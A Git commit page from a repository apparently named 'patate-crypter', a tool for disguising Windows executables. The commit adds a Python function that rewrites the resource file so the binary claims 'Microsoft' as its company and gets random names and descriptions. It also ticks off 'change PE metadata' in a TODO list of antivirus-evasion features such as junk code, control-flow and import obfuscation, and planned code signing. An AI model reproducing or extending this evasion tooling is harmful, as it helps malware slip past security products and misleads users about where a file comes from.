patate/patate-crypter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add: change PE metadata

Browse Source 
maybe it's bad to generate it randomly, maybe it'd be better to use random real-words
This commit is contained in:
ALittlePatate
2023-09-04 20:30:18 +02:00
parent 45bc629176
commit d233a273a3
7 changed files with 165 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
.gitignore vendored
View File

@@ -4,3 +4,5 @@
__pycache__
Debug
Release
config.h
sample.h

100
DllExecutor.rc Normal file
View File

@@ -0,0 +1,100 @@
// Microsoft Visual C++ generated resource script.
//
#include "resource.h"
#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"
/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
// Fran<61>ais (France) resources
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_FRA)
LANGUAGE LANG_FRENCH, SUBLANG_FRENCH
#pragma code_page(1252)
#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//
1 TEXTINCLUDE
BEGIN
"resource.h\0"
END
2 TEXTINCLUDE
BEGIN
"#include ""winres.h""\r\n"
"\0"
END
3 TEXTINCLUDE
BEGIN
"\r\n"
"\0"
END
#endif // APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Version
//
VS_VERSION_INFO VERSIONINFO
FILEVERSION 1,0,0,1
PRODUCTVERSION 1,0,0,1
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
#else
FILEFLAGS 0x0L
#endif
FILEOS 0x40004L
FILETYPE 0x1L
FILESUBTYPE 0x0L
BEGIN
BLOCK "StringFileInfo"
BEGIN
BLOCK "040c04b0"
BEGIN
VALUE "CompanyName", "Microsoft"
VALUE "FileDescription", "vhasdzagtqqfokxkxnwj"
VALUE "FileVersion", "1.0.0.1"
VALUE "InternalName", "apwjxnl.exe"
VALUE "LegalCopyright", "Copyright (C) 2023"
VALUE "OriginalFilename", "cwresrj.exe"
VALUE "ProductName", "fkdhtat.exe"
VALUE "ProductVersion", "1.0.0.1"
END
END
BLOCK "VarFileInfo"
BEGIN
VALUE "Translation", 0x40c, 1200
END
END
#endif // Fran<61>ais (France) resources
/////////////////////////////////////////////////////////////////////////////
#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//
/////////////////////////////////////////////////////////////////////////////
#endif // not APSTUDIO_INVOKED

5
DllExecutor.vcxproj
View File

@@ -117,6 +117,7 @@
<GenerateDebugInformation>false</GenerateDebugInformation>
<AdditionalOptions>/NXCOMPAT:no %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
<GenerateWindowsMetadata>true</GenerateWindowsMetadata>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
@@ -156,8 +157,12 @@
</ItemGroup>
<ItemGroup>
<ClInclude Include="config.h" />
<ClInclude Include="resource.h" />
<ClInclude Include="sample.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="DllExecutor.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>

8
DllExecutor.vcxproj.filters
View File

@@ -26,5 +26,13 @@
<ClInclude Include="config.h">
<Filter>Fichiers d%27en-tête</Filter>
</ClInclude>
<ClInclude Include="resource.h">
<Filter>Fichiers d%27en-tête</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="DllExecutor.rc">
<Filter>Fichiers de ressources</Filter>
</ResourceCompile>
</ItemGroup>
</Project>

10
gui.py
View File

@@ -13,7 +13,6 @@ TODO :
- Good entropy
- Good Section sizes
- Add resources
- Change PE metadata (company, description, etc...)
- Random Windows API calls (help)
- Code signing (optional)
@@ -22,12 +21,14 @@ Done :
- Junk code
- Control flow
- IAT obfuscation (adding "normal" imports in addition to the others)
- Change PE metadata (company, description, etc...)
"""
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QCoreApplication
from obfuscation import obfuscate
from metadata import change_metadata
import os, shutil
class Ui_mainWindow(object):
@@ -168,6 +169,13 @@ class Ui_mainWindow(object):
self.label_2.setText("done.")
QCoreApplication.processEvents()
self.label_2.setText("Changing metadata...")
QCoreApplication.processEvents()
change_metadata()
self.label_2.setText("done.")
QCoreApplication.processEvents()
self.label_2.setText("Compiling...")
QCoreApplication.processEvents()

27
metadata.py Normal file
View File

@@ -0,0 +1,27 @@
from randomness import *
def change_metadata() :
f = open("DllExecutor.rc", "r")
f_c = f.readlines()
f.close()
o = open("DllExecutor.rc", "w")
for line in f_c :
if "CompanyName" in line :
line = f'\t\t\tVALUE "CompanyName", "Microsoft"\n'
elif "FileDescription" in line :
line = f'\t\t\tVALUE "FileDescription", "{GetRandomString(20)}"\n'
elif "InternalName" in line :
line = f'\t\t\tVALUE "InternalName", "{GetRandomString(7)}.exe"\n'
elif "OriginalFilename" in line :
line = f'\t\t\tVALUE "OriginalFilename", "{GetRandomString(7)}.exe"\n'
elif "ProductName" in line :
line = f'\t\t\tVALUE "ProductName", "{GetRandomString(7)}.exe"\n'
o.write(line)
o.close()

14
resource.h Normal file
View File

@@ -0,0 +1,14 @@
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by DllExecutor.rc
// Valeurs par d<>faut suivantes des nouveaux objets
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif